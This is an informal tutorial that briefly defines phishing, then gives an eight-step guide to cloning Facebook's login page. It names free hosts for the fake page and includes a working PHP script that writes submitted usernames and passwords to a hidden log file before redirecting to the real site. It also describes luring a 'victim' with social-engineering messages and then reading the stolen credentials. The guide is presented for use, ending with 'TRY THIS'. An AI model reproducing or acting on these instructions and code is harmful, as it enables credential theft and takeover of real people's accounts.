INTRODUCTION TO PHISHING
According to Wikipedia -> Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.
Phishing is typically carried out by
e-mail spoofing, instant messaging and it often directs users to enter
details at a fake website whose look and feel are almost identical to
the legitimate one. Phishing is an example of social engineering
techniques used to deceive users and exploits the poor usability of
current web security technologies. Attempts to deal with the growing
number of reported phishing incidents include legislation, user
training, public awareness, and technical security measures.
A phishing technique was described in
detail in 1987, and (according to its creator) the first recorded use of
the term “phishing” was made in 1995. The term is a variant of fishing,
probably influenced by phreaking, and alludes to “baits” used in hopes
that the potential victim will “bite” by clicking a malicious link or
opening a malicious attachment, in which case their financial
information and passwords may then be stolen.
So from above all information you are
get to know what is phishing exactly is. So lets now start with its
demonstration on one of your favorite website**
DEMONSTRATION
So now, lets start demonstration of phishing with one of your
favorite social networking website or emailing website. There are many
more, and this method will be apply to each and everyone like gmail.com,
yahoo.com,live.com, hotmail.com, facebook.com, twitter.com, flicr,
mail.com, rediffmail.com, in.com and rest of the websites which provide
these services.
So I am gonna demonstrate you on facebook.
Step-1 :-
Register to any free web hosting website. Some website give cpanel
hosting, which is better for phishing, but however there are huge
websites which provide free hosting, Some of them are -
www.000webhost.com
www.100gb.co
www.x10hosting.com
Register with one of above free web hosting and confirm this hosting. once you done this, go to step-2.
Step-2 :- Now go www.facebook.com
and press Ctrl+U or right click on web page and view source, now copy
this all source code and paste it into the new notepad file.
Step-3 :- Now save this notepad file with name index.html on your desktop or a folder where you want.
Step-4 :- Now open one more notepad file and copy the below whole code into it.
<?php***
header (‘Location: http://www.facebook.com/ ‘);
$handler = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, “=”);
fwrite($handler, $value);
fwrite($handler, “\r\n”);
}
fwrite($handler, “\r\n”);
fclose($handler);
exit;
?>
From <?php to ?>, copy content to new notepad file and save it with any anyname.php, I am gonna save it with name login.php, you can put anyname that you want but ensure that extension should be “.php”. In the content there is a txt file (log.txt), you can put any name to txt which is not guessable, I just pur log.txt but you should that name is unguessable and its extension may b .txt or nothing.
Step-5 :-
Now, again open index.html file into notepad (I would like to
recommended you to use Notepad++ for these kind of tasks, awesome and
flexible text editor), and find (Ctrl+F for find) keyword “action” here.
you will see a keyword action=”https://www.face****” something like
this, remove this whole link which is unde double quotes “” and put here
“login.php”. Save it and exit (Ctrl+S for save).
Step-6 :-
Now upload login.php and index.html file to you file manager directory.
If it is cpanel account, upload files into file_manager ->
public_html or if it is 000webhost.com account upload index.html and
login.php into file manager as show in below image
If you are logged into your 000webhost.com account, click on the “Go to Cpanel“ in front of your domain that you had registered, and then Go to “File Manager” under Files and log into it. Now click on the public_html. Now click on upload and upload your both files.
Step-7 :-
Now visit to your subdomain, like yourname.000webhost.com and you will
see a phishing page of facebook.com. nowsend this link to a victim, say
anything like join my network or any social engineering trick and force
victim to visit you page and let him/her enter the username and
password. Once he/she enter information, username and password will be
save into log.txt file and victim will redirect to facebook’s original
link facebook.com. Victim will seems like he did enter wrong username
and password so he should enter again, when he again will enter a info,
he/she will successfully login into their facebook account. Game
over!!!!. :D
Step-8 :-
Now go to yourname.000webhost.com/log.txt and see the username and
password of victim. or you can again visit to your cpanel, here in file
manager–>public_html you will se a file log.txt, open it to view
victim’s username and password.
TRY THIS :- INTRESTING :)
